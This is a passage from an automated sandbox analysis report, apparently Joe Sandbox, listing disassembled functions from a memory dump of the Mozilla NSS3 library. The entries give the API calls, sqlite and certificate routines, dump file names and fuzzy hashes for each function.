                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8980: CERT_CopyRDN.NSS3(00000004,00000000,6C6F7310,?,?,00000004,?), ref: 6C6F8A1B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F8980: PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C6F8A74
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F1D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C6FC097,00000000,000000B0,?), ref: 6C6F1D2C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F1D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C6FC09B,00000000,00000000,00000000,?,6C6FC097,00000000,000000B0,?), ref: 6C6F1D3F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6F1D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C6FC087,00000000,000000B0,?), ref: 6C6F1D54
                                                                                                                                                                                                                                                                                          • CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C6FC0AD
                                                                                                                                                                                                                                                                                          • SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C6FC0C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C702DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C6FC0D2,6C6FC0CE,00000000,-000000D4,?), ref: 6C702DF5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C702DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C6FC0CE,00000000,-000000D4,?), ref: 6C702E27
                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C6FC0D6
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FC0E3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3955726912-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                                                          • Instruction ID: ff81610b54332fd8c8bd731754fd1c309a11048a12ea6046e00946ab95b89d33
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21A1A2A401053BFB105A61AD85FEB32AD9B0175CF084034FD15DAA46FB22D91B837A
                                                                                                                                                                                                                                                                                          Function 6C6F2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C6F2CDA,?,00000000), ref: 6C6F2E1E
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C6F9003,?), ref: 6C74FD91
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: PORT_Alloc_Util.NSS3(A4686C75,?), ref: 6C74FDA2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C75,?,?), ref: 6C74FDC4
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C6F2E33
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FD80: free.MOZGLUE(00000000,?,?), ref: 6C74FDD1
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6F2E4E
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C6F2E5E
                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C6F2E71
                                                                                                                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C6F2E84
                                                                                                                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C6F2E96
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C6F2EA9
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F2EB6
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6F2EC5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 9426349319247827a3f08c5d360b7787b34c0a8af7f5d54f163a997795813782
                                                                                                                                                                                                                                                                                          • Instruction ID: 7a9f0db5f2cccec2c1f586c328bc19031f27468542634169b65fa4ef994d7920
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9426349319247827a3f08c5d360b7787b34c0a8af7f5d54f163a997795813782
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70213B72E01101A7EF112B64EC0DADB3B7AEB5231DF544031ED2886712FB36C56ACAE5
                                                                                                                                                                                                                                                                                          Function 6C6DFC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C6DFD18
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C6DFD5F
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6DFD89
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C6DFD99
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C6DFE3C
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C6DFEE3
                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C6DFEEE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                                          • String ID: simple
                                                                                                                                                                                                                                                                                          • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                                          • Opcode ID: 989cd98035f7e8e29d670e0d75e4cfc3980a2d5941e26a927e24ebd19069adaf
                                                                                                                                                                                                                                                                                          • Instruction ID: fa1d37d543e1d6cf47048741a2570d1476496ec3cbfc43b6c5b20af4f85dc02e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 989cd98035f7e8e29d670e0d75e4cfc3980a2d5941e26a927e24ebd19069adaf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C9192B0A012069FDB04CF59C980AAAF7F1FF85318F26C568D8199B752E731F912CB95
                                                                                                                                                                                                                                                                                          Function 6C6E5CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C6E5EC9
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6E5EED
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C6E5EBE
                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C6E5EE0
                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6E5ED1
                                                                                                                                                                                                                                                                                          • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C6E5E64
                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C6E5EC3
                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C6E5EDB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                                          • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                                          • Opcode ID: 25c0303752be11ec540b933d6c9945666e14ce0ad269038ec6a0c59d88b5e61d
                                                                                                                                                                                                                                                                                          • Instruction ID: ed9abd2331c4d1bcab80ed7d460a0256c58adfee8c0e46d9adb46b5a8545d5c0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25c0303752be11ec540b933d6c9945666e14ce0ad269038ec6a0c59d88b5e61d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5781B130B0B6119BEB19CF15C848BAAB7B0BF4930CF28466AD8155BB51D734E842CBDD
                                                                                                                                                                                                                                                                                          Function 6C6CDCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CDDF9
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6CDE68
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6CDE97
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C6CDEB6
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6CDF78
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: b5d23e229c671385076b439af9eaea9ed202479190b25844bfcfefef41267546
                                                                                                                                                                                                                                                                                          • Instruction ID: cfcc01cbc6fe1ff35781604b8c670e2df3cd12ee03020ebda6bb679c3aca835b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d23e229c671385076b439af9eaea9ed202479190b25844bfcfefef41267546
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F81AF71B44300AFD714DF25C880B6A77F1EF85308F15882DE89A8BB91EB35E845C79A
                                                                                                                                                                                                                                                                                          Function 6C67CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C67B999), ref: 6C67CFF3
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C67B999), ref: 6C67D02B
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C67B999), ref: 6C67D041
                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C67B999), ref: 6C7C972B
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 80158b413bce5cb03137ac8f0d1575fea3c353848ccf72529936b266de55f615
                                                                                                                                                                                                                                                                                          • Instruction ID: 85f172e72c92bde7a9942d9c047f08be6f91d8af0aca05e5f45bf8f0383351d4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80158b413bce5cb03137ac8f0d1575fea3c353848ccf72529936b266de55f615
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE613671A052209FD3208F29C900BA6B7F5EF95318F28496DE4499BB82D37AD846C7E5
                                                                                                                                                                                                                                                                                          Function 6C77FFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C785B40: PR_GetIdentitiesLayer.NSS3 ref: 6C785B56
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C780113
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C780130
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000040), ref: 6C78015D
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C7801AF
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD056,00000000), ref: 6C780202
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C780224
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C780253
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                                                                                          • String ID: exporter
                                                                                                                                                                                                                                                                                          • API String ID: 712147604-111224270
                                                                                                                                                                                                                                                                                          • Opcode ID: 96663e29ab41a84c623af91e8b1b409823085f10c02bee10b8c7bb5efe2aa55e
                                                                                                                                                                                                                                                                                          • Instruction ID: 621887bef4de7280d500614bc249cc81c86eb234933aa30ab05a469d327c01eb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96663e29ab41a84c623af91e8b1b409823085f10c02bee10b8c7bb5efe2aa55e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94613271D037899BEF118FA4DE08BEE73B6BF4435CF148138EA1A56661E7319954C740
                                                                                                                                                                                                                                                                                          Function 6C754DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C75536F,00000022,?,?,00000000,?), ref: 6C754E70
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C754F28
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C754F8E
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C754FAE
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754FC8
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSul"
                                                                                                                                                                                                                                                                                          • API String ID: 2709355791-1913420783
                                                                                                                                                                                                                                                                                          • Opcode ID: 48348091b99101b13c157244e2860314822e2ccd4e8d525a1b41b1dc0f8a4d6b
                                                                                                                                                                                                                                                                                          • Instruction ID: 60d3cec4194cc70ec9cf6339411e0940c3eac77a074bb68115db2abfcae86e70
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48348091b99101b13c157244e2860314822e2ccd4e8d525a1b41b1dc0f8a4d6b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6514831F041498BEB01CB6E86907FF7BF99F42308F988135E894A7B81DB2698759791
                                                                                                                                                                                                                                                                                          Function 6C77EF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C79A4A1,?,00000000,?,00000001), ref: 6C77EF6D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?,6C79A4A1,?,00000000,?,00000001), ref: 6C77EFE4
                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?,00000000,?,6C79A4A1,?,00000000,?,00000001), ref: 6C77EFF1
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C79A4A1,?,00000000,?,6C79A4A1,?,00000000,?,00000001), ref: 6C77F00B
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C79A4A1,?,00000000,?,00000001), ref: 6C77F027
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
